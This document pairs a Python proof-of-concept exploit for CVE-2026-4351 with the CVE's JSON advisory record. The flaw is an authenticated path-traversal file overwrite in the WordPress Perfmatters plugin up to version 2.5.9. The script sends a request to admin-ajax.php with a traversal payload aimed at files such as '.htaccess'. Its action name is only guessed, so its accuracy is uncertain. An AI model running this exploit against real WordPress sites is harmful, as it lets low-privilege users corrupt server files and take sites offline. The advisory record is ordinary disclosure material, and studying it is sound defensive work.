CVE-2026-4351

# PoC for CVE-2026-4351 # This script demonstrates how an authenticated attacker can overwrite arbitrary files. # Target: WordPress Perfmatters Plugin <= 2.5.9 import requests def exploit(target, session_cookie, file_to_overwrite): """ target: Base URL of the WordPress site session_cookie: Authenticated WordPress cookie (Subscriber level or higher) file_to_overwrite: Path to the file to overwrite (e.g., '../../../.htaccess') """ # Constructing the URL to admin-ajax.php where the action is likely hooked url = f"{target}/wp-admin/admin-ajax.php" # Payload parameters based on vulnerability description # PMCS::action_handler() processes activate/deactivate without nonce check params = { 'action': 'pmcs_snippets_action', # Likely action name based on class PMCS context 'dotype': 'activate', # Triggering the activate handler 'snippets[]': [file_to_overwrite] # Path traversal payload in GET array } headers = { 'Cookie': session_cookie } try: # Sending GET request as per $_GET usage in description response = requests.get(url, params=params, headers=headers) if response.status_code == 200: return f"Request sent successfully. Check if {file_to_overwrite} was overwritten." else: return f"Request failed with status code: {response.status_code}" except Exception as e: return str(e) # Example Usage # target_url = "http://localhost" # user_cookie = "wordpress_logged_in_xxx=xxx" # payload_path = "../../../.htaccess" # print(exploit(target_url, user_cookie, payload_path))

{"cve": {"id": "CVE-2026-4351", "sourceIdentifier": "[email protected]", "published": "2026-04-10T02:16:03.553", "lastModified": "2026-04-24T18:01:58.517", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite via path traversal in all versions up to, and including, 2.5.9. This is due to the `PMCS::action_handler()` method processing the bulk action `activate`/`deactivate` handlers without any authorization check or nonce verification. The `$_GET['snippets'][]` values are passed unsanitized to `Snippet::activate()`/`Snippet::deactivate()` which call `Snippet::update()` then `file_put_contents()` with the traversed path. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite arbitrary files on the server with a fixed PHP docblock content, potentially causing denial of service by corrupting critical files like `.htaccess` or `index.php`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://perfmatters.io/docs/changelog/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c172ab2b-ce1f-4a0d-b31f-b75ff2f03506?source=cve", "source": "[email protected]"}]}}